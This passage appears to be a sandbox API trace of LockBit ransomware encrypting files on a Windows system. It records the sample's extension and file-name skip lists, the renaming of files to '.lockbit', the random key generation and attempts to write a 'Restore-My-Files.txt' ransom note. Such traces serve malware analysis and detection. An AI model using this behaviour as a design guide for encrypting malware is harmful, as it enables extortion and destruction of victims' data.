lpString2="J0341344.JPG") returned -1 [0158.946] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341344.JPG") returned -1 [0158.946] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341344.JPG") returned 1 [0158.946] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341344.JPG") returned -1 [0158.946] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.946] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG") returned=".JPG" [0158.946] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.946] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.946] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.946] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.946] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.946] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.947] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.947] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG.lockbit") returned 72 [0158.947] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341344.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0158.949] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.949] malloc (_Size=0x40068) returned 0x3df0008 [0158.949] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11485) returned 1 [0158.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0158.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0158.951] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0158.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.953] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.953] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.954] free (_Block=0x1fa2ed8) [0158.954] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341344.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.954] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.954] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4c6d, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341439.JPG", cAlternateFileName="")) returned 1 [0158.955] lstrcmpiW (lpString1=".", lpString2="J0341439.JPG") returned -1 [0158.955] lstrcmpiW (lpString1="..", lpString2="J0341439.JPG") returned -1 [0158.955] PathFindExtensionW (pszPath="J0341439.JPG") returned=".JPG" [0158.955] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.955] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.955] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.956] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.956] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.957] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.957] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.957] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341439.JPG") returned 1 [0158.957] lstrcmpiW (lpString1="ntldr", lpString2="J0341439.JPG") returned 1 [0158.957] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341439.JPG") returned 1 [0158.957] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341439.JPG") returned -1 [0158.957] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341439.JPG") returned -1 [0158.957] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341439.JPG") returned 1 [0158.957] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341439.JPG") returned -1 [0158.957] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.957] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG") returned=".JPG" [0158.957] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.957] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.957] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.957] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.958] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.958] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.958] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.958] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.958] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.958] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG.lockbit") returned 72 [0158.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341439.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0158.959] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.959] malloc (_Size=0x40068) returned 0x1ff1e60 [0158.959] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19565) returned 1 [0158.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0158.960] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.961] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0158.961] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0158.966] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.966] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.966] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.967] free (_Block=0x1fa2ed8) [0158.967] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341439.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.967] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.967] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4ad8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341447.JPG", cAlternateFileName="")) returned 1 [0158.967] lstrcmpiW (lpString1=".", lpString2="J0341447.JPG") returned -1 [0158.968] lstrcmpiW (lpString1="..", lpString2="J0341447.JPG") returned -1 [0158.968] PathFindExtensionW (pszPath="J0341447.JPG") returned=".JPG" [0158.968] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0158.968] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0158.968] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0158.969] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0158.969] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0158.970] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0158.970] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0158.970] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0158.970] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0158.970] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0158.970] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0158.970] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0341447.JPG") returned 1 [0158.970] lstrcmpiW (lpString1="ntldr", lpString2="J0341447.JPG") returned 1 [0158.970] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0341447.JPG") returned 1 [0158.970] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0341447.JPG") returned -1 [0158.970] lstrcmpiW (lpString1="autorun.inf", lpString2="J0341447.JPG") returned -1 [0158.970] lstrcmpiW (lpString1="thumbs.db", lpString2="J0341447.JPG") returned 1 [0158.970] lstrcmpiW (lpString1="iconcache.db", lpString2="J0341447.JPG") returned -1 [0158.970] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0158.970] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG") returned=".JPG" [0158.970] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0158.970] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0158.971] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0158.971] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0158.972] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG.lockbit") returned 72 [0158.972] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0341447.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0158.973] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0158.973] malloc (_Size=0x40068) returned 0x3d70450 [0158.973] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=19160) returned 1 [0158.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0158.974] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0158.974] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0158.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0158.974] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0158.989] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0158.989] malloc (_Size=0xa6) returned 0x1fa2ed8 [0158.989] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0158.991] free (_Block=0x1fa2ed8) [0158.991] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0341447.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0158.991] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0158.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0158.991] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56772310, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x52c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0341448.JPG", cAlternateFileName="")) returned 1 [0158.991] lstrcmpiW (lpString1=".", 